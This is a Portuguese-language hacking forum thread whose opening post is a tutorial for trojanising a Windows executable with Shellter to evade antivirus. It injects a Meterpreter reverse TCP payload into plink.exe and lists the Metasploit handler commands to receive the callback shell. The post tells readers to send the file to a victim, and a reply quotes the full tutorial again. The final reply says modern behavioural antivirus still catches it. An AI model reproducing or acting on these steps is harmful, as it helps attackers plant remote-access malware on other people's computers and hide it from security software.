Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Evadindo Anti-Vírus com o Shellter

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Matéria Evadindo Anti-Vírus com o Shellter

    P.S: Foi utilizada o Kali Linux no tutorial.

    Faça o download do Shellter:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Copie o arquivo "plink.exe" localizado em "/usr/share/windows-binaries" para o diretório que você instalou o Shellter.

    Inicie o Shellter.


    Escolha "A" para o Automatic Mode.

    No PE Target Prompt coloque o arquivo que você copiou, no caso, o "plink.exe", ou qualquer outro executável que você queira obfuscar.

    Quando pedir o tipo de Payload, selecione "L", depois escolha o "1".


    Agora, coloque o IP de seu computador. Ex: 192.168.1.39
    E a porta, foi usada a 5555.


    Espere um tempo, e o framework irá obfuscar o código do executável, retornando algo assim caso seja bem sucedido.


    Agora precisamos colocar uma porta em escuta no Kali, segue abaixo:

    • inicie o Metasploit (‘msfconsole’ no terminal)
    • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
    • set lhost 192.168.1.39
    • set lport 5555
    • exploit

    Agora você tem uma porta esperando por conexões. Envie seu executável obfuscado pelo Shellter para alguma vítima, ou teste em uma máquina virtual antes de tudo para ter certeza que está funcionando, se o firewall do roteador não está atrapalhando em nada etc. Caso tudo esteja ok, quando a vítima executar... pwnz!



    Certamente não ficará 0/0 na taxa de detecção, mas se livrarás de muitos AVS!

    Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Traduzido por dwango.
    Similar Threads

  • Font Size
    #2
    Muito Bom!

    Comment


    • Font Size
      #3
      Boaa, vlw !
      Postado Originalmente por dwango Ver Post
      P.S: Foi utilizada o Kali Linux no tutorial.

      Faça o download do Shellter:


      Copie o arquivo "plink.exe" localizado em "/usr/share/windows-binaries" para o diretório que você instalou o Shellter.

      Inicie o Shellter.


      Escolha "A" para o Automatic Mode.

      No PE Target Prompt coloque o arquivo que você copiou, no caso, o "plink.exe", ou qualquer outro executável que você queira obfuscar.

      Quando pedir o tipo de Payload, selecione "L", depois escolha o "1".


      Agora, coloque o IP de seu computador. Ex: 192.168.1.39
      E a porta, foi usada a 5555.


      Espere um tempo, e o framework irá obfuscar o código do executável, retornando algo assim caso seja bem sucedido.


      Agora precisamos colocar uma porta em escuta no Kali, segue abaixo:

      • inicie o Metasploit (‘msfconsole’ no terminal)
      • use exploit/multi/handler
      • set payload windows/meterpreter/reverse_tcp
      • set lhost 192.168.1.39
      • set lport 5555
      • exploit

      Agora você tem uma porta esperando por conexões. Envie seu executável obfuscado pelo Shellter para alguma vítima, ou teste em uma máquina virtual antes de tudo para ter certeza que está funcionando, se o firewall do roteador não está atrapalhando em nada etc. Caso tudo esteja ok, quando a vítima executar... pwnz!



      Certamente não ficará 0/0 na taxa de detecção, mas se livrarás de muitos AVS!

      Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
      Traduzido por dwango.

      Comment


      • Font Size
        #4
        : (

        Pena que na pratica nao funciona eehheheeh, porque hoje todos AVs detectam nao somente por analise statica mas por comportamento, ou seja, pega facilmente o tool do meta

        Comment

        X
        Working...
        X